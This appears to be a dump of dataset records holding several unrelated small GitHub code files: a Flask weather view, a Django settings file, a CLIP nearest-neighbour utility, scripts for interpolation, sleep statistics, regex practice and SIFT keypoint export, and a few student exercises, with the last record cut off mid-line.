url, headers=headers, params=querystring)\n json_data = json.loads(response.text)\n\n name = json_data['location']['name']\n region = json_data['location']['region']\n country = json_data['location']['country']\n lat = json_data['location']['lat']\n lon = json_data['location']['lon']\n tz_id = json_data['location']['tz_id']\n localtime_epoch = json_data['location']['localtime_epoch']\n localtime = json_data['location']['localtime']\n last_updated_epoch = json_data['current']['last_updated_epoch']\n last_updated = json_data['current']['last_updated']\n temp_c = json_data['current']['temp_c']\n temp_f = json_data['current']['temp_f']\n is_day = json_data['current']['is_day']\n condition_text = json_data['current']['condition']['text']\n condition_icon = json_data['current']['condition']['icon']\n wind_mph = json_data['current']['wind_mph']\n wind_kph = json_data['current']['wind_kph']\n wind_degree = json_data['current']['wind_degree']\n wind_dir = json_data['current']['wind_dir']\n pressure_mb = json_data['current']['pressure_mb']\n pressure_in = json_data['current']['pressure_in']\n precip_mm = json_data['current']['precip_mm']\n precip_in = json_data['current']['precip_in']\n humidity = json_data['current']['humidity']\n cloud = json_data['current']['cloud']\n feelslike_c = json_data['current']['feelslike_c']\n feelslike_f = json_data['current']['feelslike_f']\n vis_km = json_data['current']['vis_km']\n vis_miles = json_data['current']['vis_miles']\n uv = json_data['current']['uv']\n gust_mph = json_data['current']['gust_mph']\n gust_kph = json_data['current']['gust_kph']\n return render_template('home.html', name=name, region=region, country=country, lat=lat, lon=lon,\n tz_id=tz_id,\n localtime_epoch=localtime_epoch, localtime=localtime,\n last_updated_epoch=last_updated_epoch, last_updated=last_updated,\n temp_c=temp_c, temp_f=temp_f, is_day=is_day, condition_text=condition_text,\n condition_icon=condition_icon, wind_mph=wind_mph,\n wind_kph=wind_kph, wind_degree=wind_degree, wind_dir=wind_dir,\n pressure_mb=pressure_mb, pressure_in=pressure_in, precip_mm=precip_mm,\n precip_in=precip_in, humidity=humidity, cloud=cloud, feelslike_c=feelslike_c,\n feelslike_f=feelslike_f, vis_km=vis_km,\n vis_miles=vis_miles, uv=uv, gust_mph=gust_mph, gust_kph=gust_kph)\n except:\n return render_template('home.html', error='Please enter a correct City name...')\n","repo_name":"Ekbal41/Weather-App-With-Flask","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71091530928","text":"#!/usr/bin/python3\n\"\"\" 5-main \"\"\"\n__import__(\"sys\").path.append(\".\")\n\n\ndef main():\n from models.rectangle import Rectangle\n if __name__ == \"__main__\":\n\n r1 = Rectangle(4, 6, 2, 1, 12)\n print(r1)\n\n r2 = Rectangle(5, 5, 1)\n print(r2)\n\n\nmain()\n","repo_name":"Athesto/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/5-main.py","file_name":"5-main.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7606973460","text":"from . 
import BooleanFeature\nimport nltk\ntry:\n    nltk.data.find('tokenizers/punkt')\nexcept LookupError:\n    nltk.download('punkt')\n\nmale_pronouns = ['he', 'him', 'himself']\nfemale_pronouns = ['she', 'her', 'herself']\n\nclass GenderFeature(BooleanFeature):\n    def __init__(self, gender):\n        super(GenderFeature, self).__init__(self.get_gender_predicate(gender), gender)\n\n    def get_gender_predicate(self, gender):\n        assert gender in ['male', 'female']\n        def predicate(s):\n            s = nltk.word_tokenize(s)\n            male_count = sum(s.count(p) for p in male_pronouns)\n            female_count = sum(s.count(p) for p in female_pronouns)\n            if gender == 'female':\n                return female_count > male_count\n            else:\n                return male_count > female_count\n        return predicate\n","repo_name":"naver/qrs","sub_path":"src/discontrol/scorer/gender.py","file_name":"gender.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"11919678120","text":"import re\nimport datetime\n\ntext = 'ID: 123456 This is a testing class with Python with the number 123456'\n# FindAll\nmatching = re.findall('CLASS|tHIS', text, re.IGNORECASE)\n\nfor result in matching:\n    print(result)\n\n# Search with replace\nsearch = re.search('123456', text, re.IGNORECASE)\nprint(search)\n\nif search:\n    print('Value found')\n    text = re.sub('123456', '', text, re.IGNORECASE)\nelse:\n    print('Value not found')\n\nprint(text)\n\n# Split\ntext = 'ID:123456 This is a testing class with Python with the number 123456'\n\nsplit = re.split(' ', text)\nprint(split)\n\nconcat = split[4] + ' ' + split[7]\nprint(concat)\n\nfor result in split:\n    if result == 'ID:123456':\n        print('Code found')\n        break\n\n# More specific search\ntext = 'This text contains the value of Scenario:HOY now'\n\nPatronDeBusqueda = r'(?<=Scenario:)\\w+'\n\nvariables = re.findall(str(PatronDeBusqueda), text, re.IGNORECASE)\nfor variable in variables:\n    if variable == 'HOY':\n        dateToday = str(datetime.date.today().strftime('%d-%m-%Y'))\n        text = re.sub('(Scenario:)([^&.]+)', dateToday, text, re.IGNORECASE)\n        continue\n\nprint(text)\n\n\n\n","repo_name":"matiasgalvez/Selenium-with-Python","sub_path":"src/test/regular_expressions.py","file_name":"regular_expressions.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5479215643","text":"from collections import Counter, defaultdict\n\n\ndef pairs(x):\n    for char_1, char_2 in zip(x, x[1:]):\n        yield char_1 + char_2\n\n\ndef main():\n    with open(\"data/input_14.txt\", \"r\") as f:\n        raw_polymer, *raw_rules = [\n            line.rstrip(\"\\n\") for line in f.readlines() if line and line != \"\\n\"\n        ]\n\n    rules = {}\n    for rule in raw_rules:\n        pair, replacement = rule.split(\" -> \")\n        rules[pair] = replacement\n\n    start = raw_polymer[:2]\n    end = raw_polymer[-2:]\n    polymer = defaultdict(int)\n    for pair in pairs(raw_polymer):\n        polymer[pair] += 1\n\n    steps = 40\n    for step in range(1, steps + 1):\n        new_polymer = defaultdict(int)\n        if start in rules:\n            start = start[0] + rules[start]\n        if end in rules:\n            end = rules[end] + end[-1]\n\n        seen = set()\n        for pair, replacement in rules.items():\n            if pair not in polymer:\n                continue\n\n            seen.add(pair)\n            new_polymer[pair[0] + replacement] += polymer[pair]\n            new_polymer[replacement + pair[-1]] += polymer[pair]\n\n        for pair, count in polymer.items():\n            if pair not in seen:\n                new_polymer[pair] += polymer[pair]\n\n        polymer = new_polymer\n\n    
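    # `start` and `end` track the first and last two characters of the implicit
    # polymer string across the steps above; the pair-count representation alone
    # cannot tell which characters sit at the ends, and those ends are exactly
    # the characters that are not double-counted in the tallies below.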
# ignore double counting for now\n raw_counts = defaultdict(int)\n for pair, count in polymer.items():\n raw_counts[pair[0]] += count\n raw_counts[pair[-1]] += count\n\n # #### example counting check ####\n # polymer: NHC\n # polymer pairs counts: NH - 1, HC - 1\n # raw_counts: N - 1, H - 2, C - 1\n # counts: each 1\n counts = {}\n for char, count in raw_counts.items():\n if char == start[0] and char == end[-1]:\n counts[char] = int((count - 2) / 2)\n elif char == start[0] or char == end[-1]:\n counts[char] = int((count + 1) / 2)\n else:\n counts[char] = int(count / 2)\n\n ordered_counts = sorted(counts.items(), key=lambda x: x[1])\n print(ordered_counts[-1][-1] - ordered_counts[0][-1])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"minimav/advent_of_code","sub_path":"2021/puzzle_14_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"1099166659","text":"# Django settings for main project.\nimport os\nimport sys\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nPROJECT_PATH = os.path.dirname(os.path.abspath(__file__))\nADMINS = ()\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'silverlantern_dev.sqlite',\n }\n}\nif os.environ.get('ENV', 'dev') != 'dev':\n import dj_database_url\n DATABASES = {\n 'default': dj_database_url.config(),\n }\n\nLOGIN_URL = \"/login/\"\nAUTH_PROFILE_MODULE = 'main.UserProfile'\nTIME_ZONE = 'UTC'\nLANGUAGE_CODE = 'en-us'\nFIXTURE_DIRS = (\n os.path.join(PROJECT_PATH, 'main', 'sql'),\n)\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nMEDIA_ROOT = ''\nMEDIA_URL = ''\nSTATIC_ROOT = ''\nSTATIC_URL = 'https://s3.amazonaws.com/silverlantern_static/'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = ()\nSECRET_KEY = '62na=h#x3)k6m&r051hw_sz-9+0(vo9239xbs6d)tf69o!)c#x'\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n #'django.template.loaders.eggs.Loader',\n)\nROOT_URLCONF = 'main.urls'\nWSGI_APPLICATION = 'main.wsgi.application'\nTEMPLATE_DIRS = (os.path.join(PROJECT_PATH, 'templates'),)\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),\n 'PAGINATE_BY': 10\n}\nLOGIN_REDIRECT_URL = '/#/profile'\nSERIALIZATION_MODULES = {\n 'json': 'wadofstuff.django.serializers.json'\n}\nINSTALLED_APPS = (\n 'main',\n 'crispy_forms',\n 'rest_framework',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n #'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n 'django.contrib.admindocs',\n)\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n# A sample logging configuration. 
The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n    'version': 1,\n    'disable_existing_loggers': False,\n    'filters': {\n        'require_debug_false': {\n            '()': 'django.utils.log.RequireDebugFalse'\n        }\n    },\n    'handlers': {\n        'console': {\n            'level': 'INFO',\n            'class': 'logging.StreamHandler',\n            'stream': sys.stdout\n        },\n        'mail_admins': {\n            'level': 'ERROR',\n            'filters': ['require_debug_false'],\n            'class': 'django.utils.log.AdminEmailHandler'\n        }\n    },\n    'loggers': {\n        'worker': {\n            'handlers': ['console'],\n            'level': 'DEBUG',\n        },\n        'main.models': {\n            'handlers': ['console'],\n            'level': 'DEBUG',\n        },\n        'main.views': {\n            'handlers': ['console'],\n            'level': 'DEBUG',\n        },\n        'django.request': {\n            'handlers': ['mail_admins'],\n            'level': 'ERROR',\n            'propagate': True,\n        },\n    }\n}\n","repo_name":"psbanka/silverlantern","sub_path":"server/main/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"25069536075","text":"def divide_numbers(x, y):\n    try:\n        result = x / y\n        print(f\"Division result: {result}\")\n\n    except ZeroDivisionError:\n        print(\"Error! Division by zero is not allowed!\")\n\n    finally:\n        print(\"Division finished.\")\n\ntry:\n    a = float(input(\"Enter the numerator: \"))\n    b = float(input(\"Enter the denominator: \"))\n\n    divide_numbers(a, b)\n\nexcept ValueError:\n    print(\"Error! Invalid input!\")\nfinally:\n    print(\"Program finished.\")","repo_name":"PolinaNiko/lab2","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"17426350223","text":"import csv\nimport sys\nimport math\nfrom datetime import datetime, timedelta\n\nBIN_LENGTH_IN_SECONDS = 60 * 60\n\nsleeps = []\nfirst_day = None\nlast_day = None\nwith open(sys.argv[1]) as f:\n    reader = csv.reader(f)\n    next(reader)\n    for row in reader:\n        start = datetime.strptime(row[1], '%m/%d/%y, %I:%M %p')\n        end = start + timedelta(minutes=int(row[2]))\n        sleeps.append((start, end, (end - start).total_seconds()))\n\n        if first_day is None or start < first_day:\n            first_day = start\n        if last_day is None or end > last_day:\n            last_day = end\n\n# first bin is the start of the first day in the range, not the first recorded hour\nbins = [ { \"seconds\": 0, \"count\": 0 } for x in range(math.ceil((last_day - first_day).total_seconds() / BIN_LENGTH_IN_SECONDS))]\nfirst_bin = datetime(first_day.year, first_day.month, first_day.day)\n\nfor (i, bin) in enumerate(bins):\n    bin_start = first_bin + timedelta(seconds=BIN_LENGTH_IN_SECONDS * i)\n    bin_end = bin_start + timedelta(seconds=BIN_LENGTH_IN_SECONDS)\n    for sleep in sleeps:\n        starts_before_bin = sleep[0] < bin_start\n        starts_during_bin = sleep[0] >= bin_start and sleep[0] < bin_end\n        ends_after_bin = sleep[1] > bin_end\n        ends_during_bin = sleep[1] >= bin_start and sleep[1] < bin_end\n\n        addition = 0\n        if starts_during_bin and ends_during_bin:\n            addition = sleep[2]\n        elif starts_before_bin and ends_after_bin:\n            addition = BIN_LENGTH_IN_SECONDS\n        elif starts_before_bin and ends_during_bin:\n            addition = (sleep[1] - bin_start).total_seconds()\n        elif starts_during_bin and ends_after_bin:\n            addition = (bin_end - 
sleep[0]).total_seconds()\n\n        if addition > 0:\n            bins[i]['seconds'] += addition\n            bins[i]['count'] += 1\n\nsummary_bins_week = [ { 'seconds': 0, 'count': 0 } for x in range(int(7 * 24 * 60 * 60 / BIN_LENGTH_IN_SECONDS))]\nsummary_bins_day = [ { 'seconds': 0, 'count': 0 } for x in range(int(24 * 60 * 60 / BIN_LENGTH_IN_SECONDS))]\n\nfor (i, bin) in enumerate(bins):\n    bin_start = first_bin + timedelta(seconds=BIN_LENGTH_IN_SECONDS * i)\n    bin_end = bin_start + timedelta(seconds=BIN_LENGTH_IN_SECONDS)\n    day_of_week = (bin_start.weekday() + 1) % 7\n    hour_of_day = bin_start.hour\n\n    summary_bin_weekly_i = int(day_of_week * 24 * 60 * 60 / BIN_LENGTH_IN_SECONDS) + int(hour_of_day * 60 * 60 / BIN_LENGTH_IN_SECONDS)\n    summary_bin_daily_i = int(hour_of_day * 60 * 60 / BIN_LENGTH_IN_SECONDS)\n\n    summary_bins_week[summary_bin_weekly_i]['seconds'] += bin['seconds']\n    summary_bins_week[summary_bin_weekly_i]['count'] += 1\n\n    summary_bins_day[summary_bin_daily_i]['seconds'] += bin['seconds']\n    summary_bins_day[summary_bin_daily_i]['count'] += 1\n\nwith open('day.tsv', 'w') as f:\n    writer = csv.writer(f, delimiter='\\t')\n    writer.writerow(('hour', 'sleep (min)', 'count', 'avg (min)'))\n    for (i, bin) in enumerate(summary_bins_day):\n        row = [i]\n        row.append(bin['seconds'] / 60.0)\n        row.append(bin['count'])\n        row.append(bin['seconds'] / (bin['count'] * 60.0))\n        writer.writerow(row)\n\nwith open('week.tsv', 'w') as f:\n    writer = csv.writer(f, delimiter='\\t')\n    writer.writerow(('dow', 'hour', 'sleep (min)', 'count', 'avg (min)'))\n    for (i, bin) in enumerate(summary_bins_week):\n        row = []\n        row.append(math.floor(i * 60 * 60 / (BIN_LENGTH_IN_SECONDS * 24))) # day of week\n        row.append((i * 60 * 60 / BIN_LENGTH_IN_SECONDS) % 24) # hour of day\n        row.append(bin['seconds'] / 60.0)\n        row.append(bin['count'])\n        row.append(bin['seconds'] / (bin['count'] * 60.0))\n        writer.writerow(row)\n\n","repo_name":"sbma44/ellieviz","sub_path":"calc_sleep.py","file_name":"calc_sleep.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"20204372581","text":"# Kobyashova Darya Aleksandrovna, 3rd year, group 4\r\n\r\n# Write programs to find intermediate values and plot graphs of a function given at n points:\r\n# by constructing the Lagrange polynomial.\r\n# The Lagrange polynomial is sought as a linear combination of the values y = f(x) at the i-th interpolation nodes\r\n# and of polynomials L_n(x) of degree n specially constructed from the system of interpolation nodes\r\n\r\n\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nfrom generanor import *\r\n\r\ndef data_read(path: str): # define the function that reads data from a file\r\n    f = open(path, 'r')\r\n    l = f.readline() # read the first line\r\n    data = list()\r\n    while(l):\r\n        x = [float(num) for num in l.split('\\n')[0].split(', ')] # parse the list of x values from the line\r\n        l = f.readline() # read the second line\r\n        y = [float(num) for num in l.split('\\n')[0].split(', ')] # parse the list of y values from the line\r\n        data.append([x, y])\r\n        l = f.readline() # read the separator line\r\n        l = f.readline() # read the next (new first) line\r\n    return data\r\n\r\ndef interpol(data, x_found):\r\n    for i in range(len(data)):\r\n        func = 0\r\n        y_interpol = 0\r\n        x = np.linspace(data[i][0][0], data[i][0][-1]) # define the interpolation interval\r\n        for j in range(len(data[i][0])): # iterate over one data set\r\n            numerator = 1\r\n            numerator_ = 1\r\n            denominator = 1 \r\n            for k in 
range(len(data[i][0])):\r\n                if k != j:\r\n                    numerator *= x - data[i][0][k] # compute the numerator\r\n                    numerator_ *= x_found - data[i][0][k] # compute the numerator for the point of interest\r\n                    denominator *= data[i][0][j] - data[i][0][k] # compute the denominator\r\n            func += data[i][1][j] * (numerator/denominator) # evaluate the Lagrange polynomial\r\n            y_interpol += data[i][1][j] * (numerator_/denominator)\r\n        plt.plot(x, func, c='k') # connect the points\r\n        if x_found >= min(data[i][0]) and x_found <= max(data[i][0]):\r\n            plt.scatter(x_found, y_interpol, c='r', marker='*', s= 150) # the point of interest\r\n        plt.scatter(data[i][0], data[i][1]) # plot the points of each data set\r\n    plt.show()\r\n\r\nprint('Enter the x value of the point to find')\r\nx_found = float(input())\r\n\r\ninterpol(data_read('task3/task3.3.txt'), x_found)","repo_name":"woegoru/Math-modeling","sub_path":"task3/lagrange-polynomial.py","file_name":"lagrange-polynomial.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"2126595930","text":"from typing import Dict, List, Set, Tuple\n\nimport clip\nfrom loguru import logger\nfrom nltk.corpus import wordnet as wn\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.multiprocessing\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom src import datasets, utils\n\ntorch.multiprocessing.set_sharing_strategy('file_system')\n\n\ndef add_clip_visual_similarity_info_to_df(df: pd.DataFrame, dataset: str = 'imagenet') -> pd.DataFrame:\n    SELECT_TOP_K = 10\n    topk_train_indices, topk_train_targets = get_clip_knns(dataset)\n    topk_train_indices = topk_train_indices[:, :SELECT_TOP_K]\n    topk_train_targets = topk_train_targets[:, :SELECT_TOP_K]\n    df['clip_top10_train_indices'] = topk_train_indices.tolist()\n    df['clip_top10_train_targets'] = topk_train_targets.tolist()\n    return df\n\n\ndef get_clip_knns(dataset: str = 'imagenet'):\n    valid_clip_knn = utils.get_artefacts_path() / dataset / 'valid_clip_knn.npz'\n    CACHE_SELECT_K = 50\n\n    if valid_clip_knn.is_file():\n        loaded = np.load(valid_clip_knn)\n        topk_train_indices, topk_train_targets = loaded['topk_train_indices'], loaded['topk_train_targets']\n        assert topk_train_indices.shape == topk_train_targets.shape == (utils.NUM_SAMPLES[dataset], CACHE_SELECT_K)\n        return topk_train_indices, topk_train_targets\n\n    logger.info('Compute CLIP kNNs (from the training images) for the validation set')\n    # CLIP embeddings computed on the ImageNet training set\n    train_files, train_targets, train_embeddings = get_train_clip_embeddings()\n    device, model, preprocess = get_clip_model()\n    train_embeddings = torch.from_numpy(train_embeddings).to(device)\n    train_targets = torch.from_numpy(train_targets)\n\n    valid_dset = datasets.get_dataset(dataset=dataset, split='val', transform=preprocess)\n    data_loader = DataLoader(valid_dset, batch_size=128, shuffle=False, num_workers=4)\n\n    with torch.no_grad():\n        all_topk_train_indices = []\n        all_topk_train_targets = []\n        for _, inputs, _, _ in tqdm(data_loader, ncols=150, leave=False):\n            val_features = model.encode_image(inputs.to(device))\n            val_features /= val_features.norm(dim=-1, keepdim=True)\n            similarity = val_features @ train_embeddings.T\n\n            _, topk_train_indices = torch.topk(similarity, CACHE_SELECT_K, dim=-1, largest=True, sorted=True)\n            topk_train_indices = topk_train_indices.cpu()\n            topk_train_targets = train_targets[topk_train_indices]\n\n            all_topk_train_indices.append(topk_train_indices)\n            
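            # Both the validation features and train_embeddings are
            # L2-normalised, so the matrix product above is cosine similarity,
            # and torch.topk selects, for each validation image, the indices
            # of its CACHE_SELECT_K most similar training images; the fancy
            # indexing then maps those indices to their training labels.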
all_topk_train_targets.append(topk_train_targets)\n\n all_topk_train_indices = torch.cat(all_topk_train_indices).numpy()\n all_topk_train_targets = torch.cat(all_topk_train_targets).numpy()\n\n assert all_topk_train_indices.shape == (utils.NUM_SAMPLES[dataset], CACHE_SELECT_K)\n assert all_topk_train_targets.shape == (utils.NUM_SAMPLES[dataset], CACHE_SELECT_K)\n\n np.savez_compressed(\n valid_clip_knn,\n topk_train_indices=all_topk_train_indices,\n topk_train_targets=all_topk_train_targets\n )\n\n return all_topk_train_indices, all_topk_train_targets\n\n\ndef get_clip_model():\n device = utils.get_device()\n model, preprocess = clip.load('ViT-L/14@336px', device)\n return device, model, preprocess\n\n\ndef get_train_clip_embeddings():\n train_clip_embeddings_path = utils.get_artefacts_path() / 'train_clip_embeddings.npz'\n\n if train_clip_embeddings_path.is_file():\n logger.info('Load cached CLIP embeddings of the training images.')\n loaded = np.load(train_clip_embeddings_path)\n train_files, targets, embeddings = loaded['train_files'], loaded['targets'], loaded['embeddings']\n train_files = train_files.tolist()\n assert targets.ndim == 1 and embeddings.ndim == 2\n assert len(train_files) == targets.shape[0] == embeddings.shape[0]\n logger.info('Loading completed')\n return train_files, targets, embeddings\n\n logger.info('Compute the CLIP embeddings of the ImageNet training images.')\n device, model, preprocess = get_clip_model()\n\n imagenet_train_dset = datasets.get_dataset(dataset='imagenet', split='train', transform=preprocess)\n paths_prefix = imagenet_train_dset.root + '/'\n data_loader = DataLoader(imagenet_train_dset, batch_size=128, shuffle=False, num_workers=4)\n\n with torch.no_grad():\n train_files_list = []\n all_targets = []\n all_features = []\n for paths, inputs, targets, _ in tqdm(data_loader, ncols=150, leave=False):\n paths = list(paths)\n assert all(p.startswith(paths_prefix) for p in paths)\n paths = [p[len(paths_prefix):] for p in paths]\n train_files_list.extend(paths)\n\n all_targets.append(targets)\n\n features = model.encode_image(inputs.to(device))\n features /= features.norm(dim=-1, keepdim=True)\n features = features.cpu()\n all_features.append(features)\n\n all_targets = torch.cat(all_targets).numpy()\n all_features = torch.cat(all_features).numpy()\n\n assert all_targets.ndim == 1 and all_features.ndim == 2\n assert len(train_files_list) == all_targets.shape[0] == all_features.shape[0]\n\n logger.info('Cache/save the CLIP embeddings of the training images.')\n np.savez_compressed(\n train_clip_embeddings_path,\n train_files=np.array(train_files_list),\n targets=all_targets,\n embeddings=all_features\n )\n\n return train_files_list, all_targets, all_features\n\n\ndef get_wnet_proposals(\n wnet_id_pred: str, wnet_id_target: str, wnet_id_to_superclass: Dict[str, Set[str]], debug_oov: bool = False\n) -> List[Tuple[str, int]]:\n assert wnet_id_pred != wnet_id_target\n wn_synset_pred = wn.synset_from_pos_and_offset(wnet_id_pred[0], int(wnet_id_pred[1:]))\n wn_synset_target = wn.synset_from_pos_and_offset(wnet_id_target[0], int(wnet_id_target[1:]))\n blocking_ancestors: Set[int] = {node.offset() for path in wn_synset_target.hypernym_paths() for node in path}\n\n class Proposals:\n\n def __init__(self):\n self.proposals = []\n self.proposals_offset_set = set()\n\n def add_proposal_from_synset(self, synset):\n if synset.offset() in self.proposals_offset_set:\n return\n if debug_oov:\n for lemma_name in synset.lemma_names():\n print(synset.offset(), 
lemma_name.lower().replace('_', ' '))\n self.proposals.append(synset)\n self.proposals_offset_set.add(synset.offset())\n\n def to_lemma_names_list(self) -> List[Tuple[str, int]]:\n return [\n (lemma_name.lower().replace('_', ' '), proposed_synset.offset())\n for proposed_synset in self.proposals for lemma_name in proposed_synset.lemma_names()\n ]\n\n if debug_oov: print('IV and OOV proposals:')\n\n proposals = Proposals()\n assert wn_synset_pred.offset() not in blocking_ancestors, \\\n f'Maybe should be fine-grained in-voc: target={wnet_id_target}, pred={wnet_id_pred}'\n # proposals.add_proposal_from_synset(wn_synset_target)\n if debug_oov: print('* Predicted node')\n proposals.add_proposal_from_synset(wn_synset_pred)\n\n if debug_oov: print('* Same superclass with the predicted node')\n # Add from same superclass\n for wnet_id, superclass_set in wnet_id_to_superclass.items():\n if not wnet_id_to_superclass[wnet_id_pred].isdisjoint(superclass_set):\n synset = wn.synset_from_pos_and_offset(wnet_id[0], int(wnet_id[1:]))\n assert synset.offset() not in blocking_ancestors, \\\n f'Maybe should be fine-grained in-voc: target={wnet_id_target}, pred={wnet_id_pred}, ' + \\\n f'same superset clash={synset.offset()}'\n proposals.add_proposal_from_synset(synset)\n\n if debug_oov: print('* Direct siblings of the predicted node')\n # Propose the direct siblings of the predicted node\n pred_direct_parents = wn_synset_pred.hypernyms()\n for direct_parent in pred_direct_parents:\n for pred_sibling in direct_parent.hyponyms():\n if pred_sibling.offset() not in blocking_ancestors:\n proposals.add_proposal_from_synset(pred_sibling)\n\n # Ancestors of the predicted node (which are not also ancestors of the target)\n META_LABELS = [\n # From the ImageNet-X paper\n 'device',\n 'dog',\n 'commodity',\n 'bird',\n 'structure',\n 'covering',\n 'wheeled_vehicle',\n 'food',\n 'equipment',\n 'insect',\n 'vehicle',\n 'furniture',\n 'primate',\n 'vessel',\n 'snake',\n 'natural_object',\n\n # more general\n 'organism',\n 'geological_formation',\n 'clothing',\n 'container'\n ]\n\n if debug_oov: print('* (Valid) parents of the predicted node')\n for path in wn_synset_pred.hypernym_paths():\n covered_by_meta_label = False\n for node in path:\n if not covered_by_meta_label and any(meta_label in node.lemma_names() for meta_label in META_LABELS):\n covered_by_meta_label = True\n if node.offset() in blocking_ancestors:\n continue\n if covered_by_meta_label:\n proposals.add_proposal_from_synset(node)\n\n return proposals.to_lemma_names_list()\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"eth-sri/automated-error-analysis","sub_path":"src/utils_clip.py","file_name":"utils_clip.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"526713133","text":"a = input('Where do you live?')\r\nif a == 'Kazan' or a == 'Moscow' or a == 'Home':\r\n b = input('Who can lift and move both a horse and an elephant?')\r\n if b == 'Strongman' or b == 'Nobody' or b == 'Chess player':\r\n c = input('What was “tomorrow” yesterday, and tomorrow will be “yesterday”?')\r\n if c == 'I do not know' or c == 'Today' or c == 'Something':\r\n if b == 'Strongman' and c == 'Something':\r\n print('Result: You are an urban commoner! (Your IQ = 35.)')\r\n elif a == 'Kazan' and c == 'I do not know':\r\n print('Result: You Kazan know-nothing man! (Your IQ = 27.)')\r\n elif a == 'Moscow' and c == 'I do not know':\r\n print('Result: You Moscow know-nothing man! 
(Your IQ = 20.)')\r\n        elif a == 'Home' and b == 'Chess player' and c == 'Today':\r\n            print('Result: You are a tricky expert! (Your IQ = 100!)')\r\n        elif a == 'Kazan' or a == 'Moscow' or a == 'Home':\r\n            print('Result: You are not an easy urban commoner! (Your IQ = 56.)')\r\n        else:\r\n            print('Error!')\r\n    else:\r\n        print('Error!')\r\nelse:\r\n    print('Error!')\r\n","repo_name":"ArseniyCool/Python-YandexLyceum2019-2021","sub_path":"Основы программирования Python/2. Сonditional operator/ENG/IQ test.py","file_name":"IQ test.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"42838457594","text":"import cv2\nimport numpy as np\nimport json\nimport os\n\n\n# Image to insert into a new\ndirectorioActual = os.path.abspath(\"\")\n\ncarpetaImagen = \"imagenes\"\nnombreImagen = \"TemploSaturnoAhora\"\nextensionImagen = \".jpg\"\n\nnombreImagenNueva = \"TemploSAturnoAntes\"\nextensionImagenNueva = \".jpg\"\n\nimagenAJson=os.path.join(directorioActual, carpetaImagen, nombreImagen + extensionImagen)\nimgLigada=os.path.join(directorioActual, carpetaImagen, nombreImagenNueva + extensionImagenNueva)\n\nimg = cv2.imread(imagenAJson)\n\nimggris = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nimgh, imgw, _ = img.shape\n\n\nF = cv2.SIFT_create()\n\nkpimg, descimg = F.detectAndCompute(imggris, None)\n\ntemp = [{'point0':k.pt[0],'point1':k.pt[1],'size':k.size,'angle': k.angle, 'response': k.response, \"octave\":k.octave,\n         \"id\":k.class_id} for k in kpimg]\ndata = {\n    \"kpimg\":temp,\n    \"descimg\": descimg.tolist(),\n    \"imgh\": imgh,\n    \"imgw\": imgw,\n    \"imagenLigada\": imgLigada\n    #\"nombreWikipedia\":\n}\n\ncarpetaJson = \"KPJsons\"\njsonExt = \".json\"\n\narchivoIntroducir=os.path.join(directorioActual, carpetaJson, nombreImagen + jsonExt)\n\n\nwith open(archivoIntroducir, 'w') as archivo:\n    json.dump(data, 